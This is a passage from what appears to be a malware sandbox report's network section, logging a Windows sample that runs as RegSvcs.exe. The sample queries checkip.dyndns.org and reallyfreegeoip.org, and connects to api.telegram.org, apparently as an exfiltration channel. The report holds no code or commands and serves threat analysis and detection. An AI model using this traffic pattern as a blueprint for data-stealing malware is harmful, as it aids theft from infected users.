                                                                                                                  Jan 11, 2025 01:28:00.029233932 CET44355431104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:00.045466900 CET5542680192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:00.184196949 CET55432443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:28:00.184292078 CET44355432149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:00.184395075 CET55432443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:28:00.184695959 CET55432443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:28:00.184726000 CET44355432149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:00.491883993 CET44355431104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:00.493554115 CET55431443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:00.493565083 CET44355431104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:00.629772902 CET44355431104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:00.629842043 CET44355431104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:00.629899979 CET55431443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:00.630399942 CET55431443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:00.635236979 CET5542680192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:00.636518955 CET5543880192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:00.640523911 CET8055426193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:00.640711069 CET5542680192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:00.641338110 CET8055438193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:00.642101049 CET5543880192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:00.647021055 CET5543880192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:28:00.652530909 CET8055438193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:00.799463987 CET44355432149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:00.809109926 CET55432443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:28:00.809124947 CET44355432149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:00.809247971 CET55432443192.168.2.5149.154.167.220
Jan 11, 2025 01:28:00.809252977 CET | 443 | 55432 | 149.154.167.220 | 192.168.2.5
Jan 11, 2025 01:28:01.050259113 CET | 443 | 55432 | 149.154.167.220 | 192.168.2.5
Jan 11, 2025 01:28:01.050327063 CET | 443 | 55432 | 149.154.167.220 | 192.168.2.5
Jan 11, 2025 01:28:01.050379038 CET | 55432 | 443 | 192.168.2.5 | 149.154.167.220
Jan 11, 2025 01:28:01.050898075 CET | 55432 | 443 | 192.168.2.5 | 149.154.167.220
Jan 11, 2025 01:28:01.276916027 CET | 80 | 55438 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:28:01.278141022 CET | 55443 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:01.278155088 CET | 443 | 55443 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:01.278204918 CET | 55443 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:01.278409958 CET | 55443 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:01.278419018 CET | 443 | 55443 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:01.328649044 CET | 55438 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:28:01.751080990 CET | 443 | 55443 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:01.752675056 CET | 55443 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:01.752692938 CET | 443 | 55443 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:01.903867006 CET | 443 | 55443 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:01.903927088 CET | 443 | 55443 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:01.903979063 CET | 55443 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:01.904556990 CET | 55443 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:01.907687902 CET | 55438 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:28:01.908873081 CET | 55446 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:28:01.913708925 CET | 80 | 55438 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:28:01.913726091 CET | 80 | 55446 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:28:01.913765907 CET | 55438 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:28:01.913814068 CET | 55446 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:28:01.913901091 CET | 55446 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:28:01.920067072 CET | 80 | 55446 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:28:02.579885006 CET | 80 | 55446 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:28:02.602530003 CET | 55451 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:02.602580070 CET | 443 | 55451 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:02.602673054 CET | 55451 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:02.603034019 CET | 55451 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:02.603055000 CET | 443 | 55451 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:02.637495041 CET | 55446 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:28:03.057126999 CET | 443 | 55451 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:03.058981895 CET | 55451 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:03.058995962 CET | 443 | 55451 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:03.207510948 CET | 443 | 55451 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:03.207567930 CET | 443 | 55451 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:03.207828045 CET | 55451 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:03.208272934 CET | 55451 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:03.212558031 CET | 55457 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:28:03.217422009 CET | 80 | 55457 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:28:03.217483997 CET | 55457 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:28:03.217564106 CET | 55457 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:28:03.222403049 CET | 80 | 55457 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:28:03.861819983 CET | 80 | 55457 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:28:03.865489960 CET | 55463 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:03.865525007 CET | 443 | 55463 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:03.865627050 CET | 55463 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:03.865870953 CET | 55463 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:03.865880013 CET | 443 | 55463 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:03.918850899 CET | 55457 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:28:04.427181959 CET | 443 | 55463 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:04.428646088 CET | 55463 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:04.428658009 CET | 443 | 55463 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:04.585536003 CET | 443 | 55463 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:04.585691929 CET | 443 | 55463 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:04.585768938 CET | 55463 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:04.586203098 CET | 55463 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:04.589603901 CET | 55457 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:28:04.590826035 CET | 55469 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:28:04.595515966 CET | 80 | 55457 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:28:04.595575094 CET | 55457 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:28:04.596472979 CET | 80 | 55469 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:28:04.599423885 CET | 55469 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:28:04.599520922 CET | 55469 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:28:04.604288101 CET | 80 | 55469 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:28:05.243896961 CET | 80 | 55469 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:28:05.245340109 CET | 55474 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:05.245383978 CET | 443 | 55474 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:05.245444059 CET | 55474 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:05.245707035 CET | 55474 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:05.245721102 CET | 443 | 55474 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:05.294015884 CET | 55469 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:28:05.736140966 CET | 443 | 55474 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:05.737778902 CET | 55474 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:05.737869024 CET | 443 | 55474 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:05.898864031 CET | 443 | 55474 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:05.899005890 CET | 443 | 55474 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:05.899074078 CET | 55474 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:05.899462938 CET | 55474 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:05.902386904 CET | 55469 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:28:05.903340101 CET | 55479 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:28:05.907457113 CET | 80 | 55469 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:28:05.907512903 CET | 55469 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:28:05.908179998 CET | 80 | 55479 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:28:05.911149979 CET | 55479 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:28:05.911247015 CET | 55479 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:28:05.916003942 CET | 80 | 55479 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:28:06.551422119 CET | 80 | 55479 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:28:06.552671909 CET | 55482 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:06.552706003 CET | 443 | 55482 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:06.552782059 CET | 55482 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:06.553200960 CET | 55482 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:06.553219080 CET | 443 | 55482 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:06.606267929 CET | 55479 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:28:07.006575108 CET | 443 | 55482 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:07.008419037 CET | 55482 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:07.008450031 CET | 443 | 55482 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:07.130819082 CET | 443 | 55482 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:07.130877972 CET | 443 | 55482 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:07.130937099 CET | 55482 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:07.131329060 CET | 55482 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:07.136051893 CET | 55479 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:28:07.136955976 CET | 55488 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:28:07.141063929 CET | 80 | 55479 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:28:07.141118050 CET | 55479 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:28:07.141798973 CET | 80 | 55488 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:28:07.141855001 CET | 55488 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:28:07.141972065 CET | 55488 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:28:07.146728039 CET | 80 | 55488 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:28:07.777970076 CET | 80 | 55488 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:28:07.779598951 CET | 55494 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:07.779647112 CET | 443 | 55494 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:07.779752970 CET | 55494 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:07.780021906 CET | 55494 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:07.780033112 CET | 443 | 55494 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:07.825077057 CET | 55488 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:28:08.245094061 CET | 443 | 55494 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:08.246861935 CET | 55494 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:08.246896982 CET | 443 | 55494 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:08.393312931 CET | 443 | 55494 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:08.393383026 CET | 443 | 55494 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:28:08.393449068 CET | 55494 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:08.393933058 CET | 55494 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:28:08.402834892 CET | 55488 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:28:08.403611898 CET | 55499 | 443 | 192.168.2.5 | 149.154.167.220
Jan 11, 2025 01:28:08.403650045 CET | 443 | 55499 | 149.154.167.220 | 192.168.2.5
Jan 11, 2025 01:28:08.403719902 CET | 55499 | 443 | 192.168.2.5 | 149.154.167.220
Jan 11, 2025 01:28:08.404104948 CET | 55499 | 443 | 192.168.2.5 | 149.154.167.220
Jan 11, 2025 01:28:08.404115915 CET | 443 | 55499 | 149.154.167.220 | 192.168.2.5
Jan 11, 2025 01:28:08.407804966 CET | 80 | 55488 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:28:08.407859087 CET | 55488 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:28:09.077140093 CET | 443 | 55499 | 149.154.167.220 | 192.168.2.5
Jan 11, 2025 01:28:09.077225924 CET | 55499 | 443 | 192.168.2.5 | 149.154.167.220
Jan 11, 2025 01:28:09.078728914 CET | 55499 | 443 | 192.168.2.5 | 149.154.167.220
Jan 11, 2025 01:28:09.078752041 CET | 443 | 55499 | 149.154.167.220 | 192.168.2.5
Jan 11, 2025 01:28:09.079029083 CET | 443 | 55499 | 149.154.167.220 | 192.168.2.5
Jan 11, 2025 01:28:09.080495119 CET | 55499 | 443 | 192.168.2.5 | 149.154.167.220
Jan 11, 2025 01:28:09.127340078 CET | 443 | 55499 | 149.154.167.220 | 192.168.2.5
Jan 11, 2025 01:28:09.331907988 CET | 443 | 55499 | 149.154.167.220 | 192.168.2.5
Jan 11, 2025 01:28:09.331986904 CET | 443 | 55499 | 149.154.167.220 | 192.168.2.5
Jan 11, 2025 01:28:09.332072973 CET | 55499 | 443 | 192.168.2.5 | 149.154.167.220
Jan 11, 2025 01:28:09.334522009 CET | 55499 | 443 | 192.168.2.5 | 149.154.167.220
Jan 11, 2025 01:28:14.558871031 CET | 55446 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:28:14.684034109 CET | 55539 | 443 | 192.168.2.5 | 149.154.167.220
Jan 11, 2025 01:28:14.684076071 CET | 443 | 55539 | 149.154.167.220 | 192.168.2.5
Jan 11, 2025 01:28:14.684544086 CET | 55539 | 443 | 192.168.2.5 | 149.154.167.220
Jan 11, 2025 01:28:14.684952974 CET | 55539 | 443 | 192.168.2.5 | 149.154.167.220
Jan 11, 2025 01:28:14.684962988 CET | 443 | 55539 | 149.154.167.220 | 192.168.2.5
Jan 11, 2025 01:28:15.300740957 CET | 443 | 55539 | 149.154.167.220 | 192.168.2.5
Jan 11, 2025 01:28:15.302458048 CET | 55539 | 443 | 192.168.2.5 | 149.154.167.220
Jan 11, 2025 01:28:15.302486897 CET | 443 | 55539 | 149.154.167.220 | 192.168.2.5
Jan 11, 2025 01:28:15.302766085 CET | 55539 | 443 | 192.168.2.5 | 149.154.167.220
Jan 11, 2025 01:28:15.302772999 CET | 443 | 55539 | 149.154.167.220 | 192.168.2.5
Jan 11, 2025 01:28:15.484710932 CET | 443 | 55539 | 149.154.167.220 | 192.168.2.5
Jan 11, 2025 01:28:15.484798908 CET | 443 | 55539 | 149.154.167.220 | 192.168.2.5
Jan 11, 2025 01:28:15.485131025 CET | 55539 | 443 | 192.168.2.5 | 149.154.167.220
Jan 11, 2025 01:28:15.485403061 CET | 55539 | 443 | 192.168.2.5 | 149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 01:27:41.622420073 CET | 49287 | 53 | 192.168.2.5 | 1.1.1.1
Jan 11, 2025 01:27:41.629883051 CET | 53 | 49287 | 1.1.1.1 | 192.168.2.5
Jan 11, 2025 01:27:42.534759998 CET | 63683 | 53 | 192.168.2.5 | 1.1.1.1
Jan 11, 2025 01:27:42.541951895 CET | 53 | 63683 | 1.1.1.1 | 192.168.2.5
Jan 11, 2025 01:27:53.584928989 CET | 63370 | 53 | 192.168.2.5 | 1.1.1.1
Jan 11, 2025 01:27:53.591856956 CET | 53 | 63370 | 1.1.1.1 | 192.168.2.5
Jan 11, 2025 01:27:53.972352028 CET | 53 | 60345 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 01:27:41.622420073 CET | 192.168.2.5 | 1.1.1.1 | 0xbdf0 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jan 11, 2025 01:27:42.534759998 CET | 192.168.2.5 | 1.1.1.1 | 0x6f33 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jan 11, 2025 01:27:53.584928989 CET | 192.168.2.5 | 1.1.1.1 | 0x95f8 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 01:27:41.629883051 CET | 1.1.1.1 | 192.168.2.5 | 0xbdf0 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 01:27:41.629883051 CET | 1.1.1.1 | 192.168.2.5 | 0xbdf0 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 01:27:41.629883051 CET | 1.1.1.1 | 192.168.2.5 | 0xbdf0 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 01:27:41.629883051 CET | 1.1.1.1 | 192.168.2.5 | 0xbdf0 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 01:27:41.629883051 CET | 1.1.1.1 | 192.168.2.5 | 0xbdf0 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 01:27:41.629883051 CET | 1.1.1.1 | 192.168.2.5 | 0xbdf0 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 01:27:42.541951895 CET | 1.1.1.1 | 192.168.2.5 | 0x6f33 | No error (0) | reallyfreegeoip.org | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 01:27:42.541951895 CET | 1.1.1.1 | 192.168.2.5 | 0x6f33 | No error (0) | reallyfreegeoip.org | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 01:27:42.541951895 CET | 1.1.1.1 | 192.168.2.5 | 0x6f33 | No error (0) | reallyfreegeoip.org | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 01:27:42.541951895 CET | 1.1.1.1 | 192.168.2.5 | 0x6f33 | No error (0) | reallyfreegeoip.org | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 01:27:42.541951895 CET | 1.1.1.1 | 192.168.2.5 | 0x6f33 | No error (0) | reallyfreegeoip.org | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 01:27:42.541951895 CET | 1.1.1.1 | 192.168.2.5 | 0x6f33 | No error (0) | reallyfreegeoip.org | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 01:27:42.541951895 CET | 1.1.1.1 | 192.168.2.5 | 0x6f33 | No error (0) | reallyfreegeoip.org | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 01:27:53.591856956 CET | 1.1.1.1 | 192.168.2.5 | 0x95f8 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                                                                  • reallyfreegeoip.org
                                                                                                                  • api.telegram.org
                                                                                                                  • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 193.122.6.168 | 80 | 2804 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 01:27:41.645015001 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 11, 2025 01:27:42.292053938 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 00:27:42 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 01:27:42.297210932 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 11, 2025 01:27:42.488945961 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 00:27:42 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 01:27:43.211663008 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 11, 2025 01:27:43.401844025 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 00:27:43 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49707 | 193.122.6.168 | 80 | 2804 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 01:27:44.041424036 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 11, 2025 01:27:44.668097973 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 00:27:44 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49709 | 193.122.6.168 | 80 | 2804 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 01:27:45.486644030 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 11, 2025 01:27:46.146157980 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 00:27:46 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49711 | 193.122.6.168 | 80 | 2804 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 01:27:46.772192001 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 11, 2025 01:27:47.427202940 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 00:27:47 GMT
